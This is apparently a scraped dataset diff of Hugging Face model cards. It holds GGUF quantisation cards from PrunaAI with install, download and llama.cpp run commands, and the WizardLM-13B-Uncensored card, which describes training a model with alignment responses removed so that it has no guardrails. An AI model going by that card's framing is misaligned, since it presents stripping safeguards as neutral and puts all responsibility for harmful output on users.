Run one of the following commands, according to your system:
|
| 449 |
+
|
| 450 |
+
```shell
|
| 451 |
+
# Base ctransformers with no GPU acceleration
|
| 452 |
+
pip install llama-cpp-python
|
| 453 |
+
# With NVidia CUDA acceleration
|
| 454 |
+
CMAKE_ARGS=""-DLLAMA_CUBLAS=on"" pip install llama-cpp-python
|
| 455 |
+
# Or with OpenBLAS acceleration
|
| 456 |
+
CMAKE_ARGS=""-DLLAMA_BLAS=ON -DLLAMA_BLAS_VENDOR=OpenBLAS"" pip install llama-cpp-python
|
| 457 |
+
# Or with CLBLast acceleration
|
| 458 |
+
CMAKE_ARGS=""-DLLAMA_CLBLAST=on"" pip install llama-cpp-python
|
| 459 |
+
# Or with AMD ROCm GPU acceleration (Linux only)
|
| 460 |
+
CMAKE_ARGS=""-DLLAMA_HIPBLAS=on"" pip install llama-cpp-python
|
| 461 |
+
# Or with Metal GPU acceleration for macOS systems only
|
| 462 |
+
CMAKE_ARGS=""-DLLAMA_METAL=on"" pip install llama-cpp-python
|
| 463 |
+
|
| 464 |
+
# In windows, to set the variables CMAKE_ARGS in PowerShell, follow this format; eg for NVidia CUDA:
|
| 465 |
+
$env:CMAKE_ARGS = ""-DLLAMA_OPENBLAS=on""
|
| 466 |
+
pip install llama-cpp-python
|
| 467 |
+
```
|
| 468 |
+
|
| 469 |
+
#### Simple llama-cpp-python example code
|
| 470 |
+
|
| 471 |
+
```python
|
| 472 |
+
from llama_cpp import Llama
|
| 473 |
+
|
| 474 |
+
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
|
| 475 |
+
llm = Llama(
|
| 476 |
+
model_path=""./WhiteRabbitNeo-13B-v1.IQ3_M.gguf"", # Download the model file first
|
| 477 |
+
n_ctx=32768, # The max sequence length to use - note that longer sequence lengths require much more resources
|
| 478 |
+
n_threads=8, # The number of CPU threads to use, tailor to your system and the resulting performance
|
| 479 |
+
n_gpu_layers=35 # The number of layers to offload to GPU, if you have GPU acceleration available
|
| 480 |
+
)
|
| 481 |
+
|
| 482 |
+
# Simple inference example
|
| 483 |
+
output = llm(
|
| 484 |
+
""<s>[INST] {{prompt}} [/INST]"", # Prompt
|
| 485 |
+
max_tokens=512, # Generate up to 512 tokens
|
| 486 |
+
stop=[""</s>""], # Example stop token - not necessarily correct for this specific model! Please check before using.
|
| 487 |
+
echo=True # Whether to echo the prompt
|
| 488 |
+
)
|
| 489 |
+
|
| 490 |
+
# Chat Completion API
|
| 491 |
+
|
| 492 |
+
llm = Llama(model_path=""./WhiteRabbitNeo-13B-v1.IQ3_M.gguf"", chat_format=""llama-2"") # Set chat_format according to the model you are using
|
| 493 |
+
llm.create_chat_completion(
|
| 494 |
+
messages = [
|
| 495 |
+
{{""role"": ""system"", ""content"": ""You are a story writing assistant.""}},
|
| 496 |
+
{{
|
| 497 |
+
""role"": ""user"",
|
| 498 |
+
""content"": ""Write a story about llamas.""
|
| 499 |
+
}}
|
| 500 |
+
]
|
| 501 |
+
)
|
| 502 |
+
```
|
| 503 |
+
|
| 504 |
+
- **Option D** - Running with LangChain
|
| 505 |
+
|
| 506 |
+
Here are guides on using llama-cpp-python and ctransformers with LangChain:
|
| 507 |
+
|
| 508 |
+
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
|
| 509 |
+
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
|
| 510 |
+
|
| 511 |
+
## Configurations
|
| 512 |
+
|
| 513 |
+
The configuration info are in `smash_config.json`.
|
| 514 |
+
|
| 515 |
+
## Credits & License
|
| 516 |
+
|
| 517 |
+
The license of the smashed model follows the license of the original model. Please check the license of the original model before using this model which provided the base model. The license of the `pruna-engine` is [here](https://pypi.org/project/pruna-engine/) on Pypi.
|
| 518 |
+
|
| 519 |
+
## Want to compress other models?
|
| 520 |
+
|
| 521 |
+
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
|
| 522 |
+
- Request access to easily compress your own AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).","{""id"": ""PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed"", ""author"": ""PrunaAI"", ""sha"": ""de9d8c2c01f497e22b16771baec0944f7657ea8a"", ""last_modified"": ""2025-02-19 07:52:12+00:00"", ""created_at"": ""2025-02-19 07:52:08+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""pruna-ai"", ""base_model:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""base_model:finetune:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-19 07:52:12+00:00"", ""cardData"": ""base_model: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""transformersInfo"": null, ""_id"": ""67b58da87091b54e2349c595"", ""modelId"": ""PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BPrunaAI%2FWhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed%5D(%2FPrunaAI%2FWhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
WizardLM-13B-Uncensored_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv
ADDED
|
@@ -0,0 +1,239 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
cognitivecomputations/WizardLM-13B-Uncensored,"---
|
| 3 |
+
license: other
|
| 4 |
+
datasets:
|
| 5 |
+
- ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered
|
| 6 |
+
tags:
|
| 7 |
+
- uncensored
|
| 8 |
+
---
|
| 9 |
+
This is WizardLM trained with a subset of the dataset - responses that contained alignment / moralizing were removed. The intent is to train a WizardLM that doesn't have alignment built-in, so that alignment (of any sort) can be added separately with for example with a RLHF LoRA.
|
| 10 |
+
|
| 11 |
+
Shout out to the open source AI/ML community, and everyone who helped me out.
|
| 12 |
+
|
| 13 |
+
Note:
|
| 14 |
+
An uncensored model has no guardrails.
|
| 15 |
+
You are responsible for anything you do with the model, just as you are responsible for anything you do with any dangerous object such as a knife, gun, lighter, or car.
|
| 16 |
+
Publishing anything this model generates is the same as publishing it yourself.
|
| 17 |
+
You are responsible for the content you publish, and you cannot blame the model any more than you can blame the knife, gun, lighter, or car for what you do with it.","{""id"": ""cognitivecomputations/WizardLM-13B-Uncensored"", ""author"": ""cognitivecomputations"", ""sha"": ""9025c5f96fef9525da9238369ad082961b0e9494"", ""last_modified"": ""2023-05-12 23:08:43+00:00"", ""created_at"": ""2023-05-09 18:56:32+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 523, ""downloads_all_time"": null, ""likes"": 592, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llama"", ""text-generation"", ""uncensored"", ""dataset:ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered"", ""license:other"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered\nlicense: other\ntags:\n- uncensored"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": {""__type"": ""AddedToken"", ""content"": ""<s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""eos_token"": {""__type"": ""AddedToken"", ""content"": ""</s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""pad_token"": null, ""unk_token"": {""__type"": ""AddedToken"", ""content"": ""<unk>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""h2oai/h2ogpt-chatbot"", ""eduagarcia/open_pt_llm_leaderboard"", ""h2oai/h2ogpt-chatbot2"", ""Intel/low_bit_open_llm_leaderboard"", ""BAAI/open_cn_llm_leaderboard"", ""gsaivinay/open_llm_leaderboard"", ""GTBench/GTBench"", ""Vikhrmodels/small-shlepa-lb"", ""Oddity/ehartford-WizardLM-13B-Uncensored"", ""sawblade/ehartford-WizardLM-13B-Uncensored"", ""kz-transformers/kaz-llm-lb"", ""felixz/open_llm_leaderboard"", ""TRaw/ehartford-WizardLM-13B-Uncensored"", ""OPTML-Group/UnlearnCanvas-Benchmark"", ""BAAI/open_flageval_vlm_leaderboard"", ""b1sheng/kg_llm_leaderboard_test"", ""neubla/neubla-llm-evaluation-board"", ""lapsapking/h2ogpt-chatbot"", ""nuwa/ehartford-WizardLM-13B-Uncensored"", ""upashu/ehartford-WizardLM-13B-Uncensored"", ""0xeureka/ehartford-WizardLM-13B-Uncensored"", ""cownclown/ehartford-WizardLM-13B-Uncensored-v2"", ""rodrigomasini/data_only_open_llm_leaderboard"", ""Docfile/open_llm_leaderboard"", ""his0/h2ogpt-chatbot"", ""atimughal662/InfoFusion"", ""satan4191/ehartford-WizardLM-13B-Uncensored"", ""Jacob209/ehartford-WizardLM-13B-Uncensored"", ""dorkai/SinGPT-Small"", ""234bcn/ehartford-WizardLM-13B-Uncensored"", ""sssdtgvg/ehartford-WizardLM-13B-Uncensored"", ""pmb99/ehartford-WizardLM-13B-Uncensored"", ""Myaptla/ehartford-WizardLM-13B-Uncensored"", ""Testrnfjfjfrj/ehartford-WizardLM-13B-Uncensored"", ""arcaha/ehartford-WizardLM-13B-Uncensored"", ""Findinme/ehartford-WizardLM-13B-Uncensored"", ""JustMe4Real/ehartford-WizardLM-13B-Uncensored"", ""Andrezz/ehartford-WizardLM-13B-Uncensored"", ""akashkj/H2OGPT"", ""bscrivener/ehartford-WizardLM-13B-Uncensored-dupe"", ""Vinnybustacap/ehartford-WizardLM-13B-Uncensored"", ""asach/ehartford-WizardLM-13B-Uncensored"", ""Fscott8/ehartford-WizardLM-13B-Uncensored"", ""tyy130/ehartford-WizardLM-13B-Uncensored"", ""rahduke/ehartford-WizardLM-13B-Uncensored"", ""ghufran919/ehartford-WizardLM-13B-Uncensored"", ""ryanmacri/ehartford-WizardLM-13B-Uncensored"", ""ariel0330/h2osiri"", ""elitecode/h2ogpt-chatbot2"", ""Lordsony/ehartford-WizardLM-13B-Uncensored"", ""t0int/ehartford-WizardLM-13B-Uncensored"", ""ccoreilly/aigua-xat"", ""Sambhavnoobcoder/h2ogpt-chatbot"", ""Nexe/ehartford-WizardLM-13B-Uncensored"", ""k4b00m/ehartford-WizardLM-13B-Uncensored"", ""hdhdhsnah/ehartford-WizardLM-13B-Uncensored"", ""Riottt/13b"", ""asd123123asd/ehartford-WizardLM-13B-Uncensored"", ""Wisjdkwidndj/ehartford-WizardLM-13B-Uncensored"", ""intellecttech/ehartford-WizardLM-13B-Uncensored"", ""markendsley/ehartford-WizardLM-13B-Uncensored2"", ""bigraj/ehartford-WizardLM-13B-Uncensored"", ""zenonx/ehartford-WizardLM-13B-Uncensored3"", ""krisskross43/ehartford-WizardLM-13B-Uncensored"", ""antilopa/ehartford-WizardLM-13B-Uncensored"", ""girit/Proof-Read-Uncensored"", ""jimjonesbabyfreshout/ehartford-WizardLM-13B-Uncensored"", ""SorcererSupreme/cognitivecomputations-WizardLM-13B-Uncensored"", ""ssinss93/ehartford-WizardLM-13B-Uncensored"", ""herobrian389/ehartford-WizardLM-13B-Uncensored"", ""Unknown4321/Gratify"", ""SamGro/cognitivecomputations-WizardLM-13B-Uncensored"", ""TonyAdams/cognitivecomputations-WizardLM-13B-Uncensored"", ""JeremGaming/cognitivecomputations-WizardLM-13B-Uncensored"", ""Kiadee/cognitivecomputations-WizardLM-13B-Uncensored"", ""kapilyadav/cognitivecomputations-WizardLM-13B-Uncensored"", ""frenzen/cognitivecomputations-WizardLM-13B-Uncensored"", ""juanenrique/cognitivecomputations-WizardLM-13B-Uncensored"", ""virtuehearts/ehartford-WizardLM-13B-Uncensored"", ""gunnit/ehartford-WizardLM-13B-Uncensored"", ""smothiki/open_llm_leaderboard"", ""pngwn/open_llm_leaderboard"", ""winterwebs/cognitivecomputations-WizardLM-13B-Uncensored"", ""Kiadee/WizardLM-13B-Uncensored"", ""Illuminum/cognitivecomputations-WizardLM-13B-Uncensored"", ""pngwn/open_llm_leaderboard_two"", ""iblfe/test"", ""mithroi/ehartford-WizardLM-13B-Uncensored"", ""McletsHacks/cognitivecomputations-WizardLM-13B-Uncensored"", ""willk/ehartford-WizardLM-13B-Uncensored"", ""AnonymousSub/Ayurveda_Chatbot"", ""Viperissleepy/cognitivecomputations-WizardLM-13B-Uncensored"", ""K00B404/Research-chatbot"", ""Sunrusojsis/llama-hf-7b-chat"", ""0x1668/open_llm_leaderboard"", ""pngwn/open_llm_leaderboard-check"", ""ianott/ehartford-WizardLM-13B-Uncensored"", ""Heem954/cognitivecomputations-WizardLM-13B-Uncensored"", ""nopesirnope/ehartford-WizardLM-13B-Uncensored"", ""swaichsaheb/ehartford-WizardLM-13B-Uncensored""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-05-12 23:08:43+00:00"", ""cardData"": ""datasets:\n- ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered\nlicense: other\ntags:\n- uncensored"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""645a9760e505443f81956d37"", ""modelId"": ""cognitivecomputations/WizardLM-13B-Uncensored"", ""usedStorage"": 52064191977}",0,https://huggingface.co/PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed,1,,0,"https://huggingface.co/TheBloke/WizardLM-13B-Uncensored-GGUF, https://huggingface.co/TheBloke/WizardLM-13B-Uncensored-AWQ, https://huggingface.co/Ffftdtd5dtft/WizardLM-13B-Uncensored-Q2_K-GGUF, https://huggingface.co/height229/WizardLM-13B-Uncensored-Q4_K_M-GGUF, https://huggingface.co/toni3000/WizardLM-13B-Uncensored-Q4_K_M-GGUF, https://huggingface.co/mradermacher/WizardLM-13B-Uncensored-GGUF, https://huggingface.co/mradermacher/WizardLM-13B-Uncensored-i1-GGUF, https://huggingface.co/FaolanKusibo/WizardLM-13B-Uncensored-Q4_K_M-GGUF",8,,0,"BAAI/open_cn_llm_leaderboard, BAAI/open_flageval_vlm_leaderboard, GTBench/GTBench, Intel/low_bit_open_llm_leaderboard, OPTML-Group/UnlearnCanvas-Benchmark, Vikhrmodels/small-shlepa-lb, eduagarcia/open_pt_llm_leaderboard, h2oai/h2ogpt-chatbot, h2oai/h2ogpt-chatbot2, huggingface/InferenceSupport/discussions/new?title=cognitivecomputations/WizardLM-13B-Uncensored&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bcognitivecomputations%2FWizardLM-13B-Uncensored%5D(%2Fcognitivecomputations%2FWizardLM-13B-Uncensored)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jimjonesbabyfreshout/ehartford-WizardLM-13B-Uncensored, lapsapking/h2ogpt-chatbot, sawblade/ehartford-WizardLM-13B-Uncensored",13
|
| 18 |
+
PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed,"---
|
| 19 |
+
thumbnail: ""https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg""
|
| 20 |
+
base_model: cognitivecomputations/WizardLM-13B-Uncensored
|
| 21 |
+
metrics:
|
| 22 |
+
- memory_disk
|
| 23 |
+
- memory_inference
|
| 24 |
+
- inference_latency
|
| 25 |
+
- inference_throughput
|
| 26 |
+
- inference_CO2_emissions
|
| 27 |
+
- inference_energy_consumption
|
| 28 |
+
tags:
|
| 29 |
+
- pruna-ai
|
| 30 |
+
---
|
| 31 |
+
<!-- header start -->
|
| 32 |
+
<!-- 200823 -->
|
| 33 |
+
<div style=""width: auto; margin-left: auto; margin-right: auto"">
|
| 34 |
+
<a href=""https://www.pruna.ai/"" target=""_blank"" rel=""noopener noreferrer"">
|
| 35 |
+
<img src=""https://i.imgur.com/eDAlcgk.png"" alt=""PrunaAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
|
| 36 |
+
</a>
|
| 37 |
+
</div>
|
| 38 |
+
<!-- header end -->
|
| 39 |
+
|
| 40 |
+
[](https://twitter.com/PrunaAI)
|
| 41 |
+
[](https://github.com/PrunaAI)
|
| 42 |
+
[](https://www.linkedin.com/company/93832878/admin/feed/posts/?feedType=following)
|
| 43 |
+
[](https://discord.com/invite/vb6SmA3hxu)
|
| 44 |
+
|
| 45 |
+
## This repo contains GGUF versions of the cognitivecomputations/WizardLM-13B-Uncensored model.
|
| 46 |
+
|
| 47 |
+
# Simply make AI models cheaper, smaller, faster, and greener!
|
| 48 |
+
|
| 49 |
+
- Give a thumbs up if you like this model!
|
| 50 |
+
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
|
| 51 |
+
- Request access to easily compress your *own* AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
|
| 52 |
+
- Read the documentations to know more [here](https://pruna-ai-pruna.readthedocs-hosted.com/en/latest/)
|
| 53 |
+
- Join Pruna AI community on Discord [here](https://discord.gg/rskEr4BZJx) to share feedback/suggestions or get help.
|
| 54 |
+
|
| 55 |
+
**Frequently Asked Questions**
|
| 56 |
+
- ***How does the compression work?*** The model is compressed with GGUF.
|
| 57 |
+
- ***How does the model quality change?*** The quality of the model output might vary compared to the base model.
|
| 58 |
+
- ***What is the model format?*** We use GGUF format.
|
| 59 |
+
- ***What calibration data has been used?*** If needed by the compression method, we used WikiText as the calibration data.
|
| 60 |
+
- ***How to compress my own models?*** You can request premium access to more compression methods and tech support for your specific use-cases [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
|
| 61 |
+
|
| 62 |
+
# Downloading and running the models
|
| 63 |
+
|
| 64 |
+
You can download the individual files from the Files & versions section. Here is a list of the different versions we provide. For more info checkout [this chart](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9) and [this guide](https://www.reddit.com/r/LocalLLaMA/comments/1ba55rj/overview_of_gguf_quantization_methods/):
|
| 65 |
+
|
| 66 |
+
| Quant type | Description |
|
| 67 |
+
|------------|--------------------------------------------------------------------------------------------|
|
| 68 |
+
| Q5_K_M | High quality, recommended. |
|
| 69 |
+
| Q5_K_S | High quality, recommended. |
|
| 70 |
+
| Q4_K_M | Good quality, uses about 4.83 bits per weight, recommended. |
|
| 71 |
+
| Q4_K_S | Slightly lower quality with more space savings, recommended. |
|
| 72 |
+
| IQ4_NL | Decent quality, slightly smaller than Q4_K_S with similar performance, recommended. |
|
| 73 |
+
| IQ4_XS | Decent quality, smaller than Q4_K_S with similar performance, recommended. |
|
| 74 |
+
| Q3_K_L | Lower quality but usable, good for low RAM availability. |
|
| 75 |
+
| Q3_K_M | Even lower quality. |
|
| 76 |
+
| IQ3_M | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
|
| 77 |
+
| IQ3_S | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
|
| 78 |
+
| Q3_K_S | Low quality, not recommended. |
|
| 79 |
+
| IQ3_XS | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
|
| 80 |
+
| Q2_K | Very low quality but surprisingly usable. |
|
| 81 |
+
|
| 82 |
+
|
| 83 |
+
## How to download GGUF files ?
|
| 84 |
+
|
| 85 |
+
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
|
| 86 |
+
|
| 87 |
+
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
|
| 88 |
+
|
| 89 |
+
* LM Studio
|
| 90 |
+
* LoLLMS Web UI
|
| 91 |
+
* Faraday.dev
|
| 92 |
+
|
| 93 |
+
- **Option A** - Downloading in `text-generation-webui`:
|
| 94 |
+
- **Step 1**: Under Download Model, you can enter the model repo: cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed and below it, a specific filename to download, such as: phi-2.IQ3_M.gguf.
|
| 95 |
+
- **Step 2**: Then click Download.
|
| 96 |
+
|
| 97 |
+
- **Option B** - Downloading on the command line (including multiple files at once):
|
| 98 |
+
- **Step 1**: We recommend using the `huggingface-hub` Python library:
|
| 99 |
+
```shell
|
| 100 |
+
pip3 install huggingface-hub
|
| 101 |
+
```
|
| 102 |
+
- **Step 2**: Then you can download any individual model file to the current directory, at high speed, with a command like this:
|
| 103 |
+
```shell
|
| 104 |
+
huggingface-cli download cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed WizardLM-13B-Uncensored.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 105 |
+
```
|
| 106 |
+
<details>
|
| 107 |
+
<summary>More advanced huggingface-cli download usage (click to read)</summary>
|
| 108 |
+
Alternatively, you can also download multiple files at once with a pattern:
|
| 109 |
+
|
| 110 |
+
```shell
|
| 111 |
+
huggingface-cli download cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
|
| 112 |
+
```
|
| 113 |
+
|
| 114 |
+
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
|
| 115 |
+
|
| 116 |
+
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
|
| 117 |
+
|
| 118 |
+
```shell
|
| 119 |
+
pip3 install hf_transfer
|
| 120 |
+
```
|
| 121 |
+
|
| 122 |
+
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
|
| 123 |
+
|
| 124 |
+
```shell
|
| 125 |
+
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed WizardLM-13B-Uncensored.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 126 |
+
```
|
| 127 |
+
|
| 128 |
+
Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
|
| 129 |
+
</details>
|
| 130 |
+
<!-- README_GGUF.md-how-to-download end -->
|
| 131 |
+
|
| 132 |
+
<!-- README_GGUF.md-how-to-run start -->
|
| 133 |
+
|
| 134 |
+
## How to run model in GGUF format?
|
| 135 |
+
- **Option A** - Introductory example with `llama.cpp` command
|
| 136 |
+
|
| 137 |
+
Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
|
| 138 |
+
|
| 139 |
+
```shell
|
| 140 |
+
./main -ngl 35 -m WizardLM-13B-Uncensored.IQ3_M.gguf --color -c 32768 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""<s>[INST] {{prompt\}} [/INST]""
|
| 141 |
+
```
|
| 142 |
+
|
| 143 |
+
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
|
| 144 |
+
|
| 145 |
+
Change `-c 32768` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically. Note that longer sequence lengths require much more resources, so you may need to reduce this value.
|
| 146 |
+
|
| 147 |
+
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
|
| 148 |
+
|
| 149 |
+
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
|
| 150 |
+
|
| 151 |
+
